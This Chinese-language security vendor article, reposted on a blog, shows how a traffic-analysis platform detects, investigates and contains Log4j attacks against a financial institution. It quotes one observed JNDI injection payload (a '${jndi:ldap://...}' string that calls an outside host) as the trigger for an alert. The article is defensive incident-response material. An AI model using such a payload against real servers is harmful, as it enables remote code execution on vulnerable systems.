「神剑攻防演练宝典」之0day漏洞攻击调查

admin 2022年5月26日14:44:04安全闲碎评论10 views2413字阅读8分2秒阅读模式


「神剑攻防演练宝典」之0day漏洞攻击调查


某金融机构

该机构管理与技术体系规模复杂且庞大,是数字化转型的先行者,最早步入信息化建设,但随着0day/Nday、邮件钓鱼、社工、Web攻击等侵蚀与不断演进,在“敌在暗,我在明”激烈博弈过程中,企业发现仅靠被动防御已然力所不及,亟需将主动防御能力纳入当下安全建设中,并全力破解下述面临难题:

1

体系建设比较全,但对于0day应对能力不足;

2

对于复杂的攻击事件要进行完整的溯源,需要多种复杂分析手段共同完成;

3

流量数据无法覆盖长周期,历史数据不足使分析人员无法追溯;

4

经过每次攻击的发现,需要不断的去调整内部的策略,攻击者画像与途径显得至关重要。


魔高一尺,道高一丈

二进制漏洞攻防你来我往

手法越来越刁钻

企业如何从被动防御变为主动出击?


以响应log4j 漏洞攻击为例,实践证明,象守全流量安全计算分析平台可高效的从多角度实现调查、检测、阻断等功能动作,助力企业从容应对0day攻击。

「神剑攻防演练宝典」之0day漏洞攻击调查

点击空白处查看解决方案

「神剑攻防演练宝典」之0day漏洞攻击调查
「神剑攻防演练宝典」之0day漏洞攻击调查
「神剑攻防演练宝典」之0day漏洞攻击调查

第一阶段——快速响应。本阶段往往还没有相关的漏洞详情公开,颇有“山雨欲来风满楼”之味。依托于象守强大的分布式流量探针,可对大流量进行高效解析,帮助企业捕获流量中的蛛丝马迹。


在象守上出现风险告警,发现攻击payload “${jndi:ldap://ad577be4.dns.1433.eu.org}”的DNS请求告警,根据风险详情,快速追踪DNS请求IP,判定为0Day漏洞Log4j攻击成功,并快速输出漏洞利用点。


象守提供的风险详情面板模块,支持查看风险相关网络会话、攻击特征、请求/响应包等原始凭据,支撑风险事件定量分析。而后跳转到数据湖查看请求的协议日志详情,甚至下载原始流量凭证进行深度分析。由此快速掌握有效证据并完成风险事件的精准判定。最后,使用HTTP协议监测模型,针对 HTTP 协议相关字段,创建“Log4j监测”规则对攻击特征的监测覆盖,即可实现快速规则添加,满足检测需求。

「神剑攻防演练宝典」之0day漏洞攻击调查
「神剑攻防演练宝典」之0day漏洞攻击调查
「神剑攻防演练宝典」之0day漏洞攻击调查

右滑继续调查

「神剑攻防演练宝典」之0day漏洞攻击调查
「神剑攻防演练宝典」之0day漏洞攻击调查

第二阶段——深剖与巩固。这一阶段,往往已经获取到了一部分攻击特征,但依然有问题需要解决。如:攻击者从何时开始使用0day漏洞攻击?资产设备是否受到影响甚至已经失陷?此时长周期数据存储便派上用场了,所谓“来者犹可追”,即使攻击事件已经发生,通过对历史流量数据的深入分析,可以迅速知晓攻击影响面并发起响应。

「神剑攻防演练宝典」之0day漏洞攻击调查

象守综合风险信息中确认的Log4j 漏洞攻击成功,并输出存在漏洞利用成功的路径和对象,强化攻击画像,高效还原攻击过程。象守使用“时间范围”与“IP范围”联系DNS请求内容,跨协议复合查询 HTTP 和 TCP 的URL、Request_body,找到所有命中域名以及对外请求恶意的源IP之间的访问关系,快速定位受影响失陷对象;当排查到攻击者IP或者受害资产IP时,可以分别从HTTP,IPFIX,DNS,SSL这四个协议入手进行排查,发现攻击者IP或者受害资产IP更多的相关流量。


在风险事件研判后,需要使用到协议分析、调查画布、攻击者画像功能找出攻击路径及影响面,再利用攻击离线检测模型验证攻击有效性,最大程度的降低误报。

协议分析

从不同协议层次分析网络建联关系、通信活跃度、流量趋势、请求频次及查询状态,从而调查主机存在的其它表征活动,完成风险事件定性评价;

调查画布

于大数据图谱分析技术,能够清晰展示实体间访问关系。运营人员将风险事件中IP、URL等IoC信标作为调查对象,通过全局视角的下钻探索,可快速掌握多次攻击所产生的影响面;还可对任意节点进行拓展分析,从而找出其它攻击线索;

攻击者画像

描绘了所有风险事件相关的攻击者身份画像,能够帮助防守方掌握攻击者常用攻击工具、攻击偏好目标、活跃时间信息,从而对攻击者进行差异化处置响应;结合攻击者画像详情,可以直观了解到攻击者在一段时间内的攻击路径;

攻击离线检测模型

根据模型可实现全时段的长周期历史数据的全面回溯,有效验证规则的有效性。当使用Log4j 漏洞的初期特征作为规则上线时,很容易触发大量告警,导致风险列表被海量事件淹没。通过此功能模块,可以实现对最大化压缩误报率,保证规则上线前的准确度。此外,用户的IPS设备亦需要较高的规则准确度以确保不因过度封禁影响业务,更需要使用本功能进行规则测试。

「神剑攻防演练宝典」之0day漏洞攻击调查
「神剑攻防演练宝典」之0day漏洞攻击调查
「神剑攻防演练宝典」之0day漏洞攻击调查
「神剑攻防演练宝典」之0day漏洞攻击调查
「神剑攻防演练宝典」之0day漏洞攻击调查

右滑继续调查

「神剑攻防演练宝典」之“0day漏洞攻击调查”
「神剑攻防演练宝典」之“0day漏洞攻击调查”

第三阶段——强化对抗。这一阶段,随着Log4j 攻击细节披露,会发现越来越多的扫描行为,而且攻击绕过的方法千变万化。自当是“他强由他强,清风拂山冈”。安全专家需根据其变形方法,快速进行策略升级,将未来攻击挡于门外。

象守的安全专家已从流量数据发现log4j 的变形攻击payload 示例如下:

「神剑攻防演练宝典」之0day漏洞攻击调查

从源码层面进行版本代码对比分析,梳理攻击链,并构建可能绕过手段,目前象守已更新针对Log4j漏洞的检测策略。得益于象守云端中心高效的规则一体化,最新策略规则可以达到小时级响应升级。Log4j 事件期间已进行多次优化升级,无障碍提升检测能力。

「神剑攻防演练宝典」之0day漏洞攻击调查
「神剑攻防演练宝典」之0day漏洞攻击调查

国家级攻防演练中,我们常常看见防守方在面对已发生重大安全事件时,由于缺少数据来支撑调查分析等后续动作,错过了防御的最佳时机,抱憾失分;或是溯源时缺少相应的电子证据,无法完成溯源报告,造成上分失败。


象守安全计算分析平台在历届的攻防场景实战中表现良好,被验证是攻防战防守方最具核心价值的武器之一。其全流量采集技术、不断沉淀与迭代IoC信标库,从攻击者的视角进行行为分析,可为防守者提供最实用的攻击调查手段,第一时间查出入侵与利用情况。


相较传统的海量日志查询研判入侵攻击面,其交互可视化的数据分析亦可大大提升防守者对攻击猜想的验证效率,帮助防守方第一时间封堵IP并发起溯源响应,成功得分不再难。


//精彩剧透//


“神剑”下期将为您带来

攻防演练系列之隐蔽隧道通讯检测篇

何为隐蔽隧道通讯?

为何现有设备难以检测隐蔽隧道攻击?

如何构建针对隐蔽信道通讯的监测模型?

且看下期神剑研究员为你娓娓道来。


「神剑攻防演练宝典」之0day漏洞攻击调查

原文始发于微信公众号(神剑实验室):「神剑攻防演练宝典」之“0day漏洞攻击调查”

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月26日14:44:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  「神剑攻防演练宝典」之0day漏洞攻击调查 http://cn-sec.com/archives/1052011.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: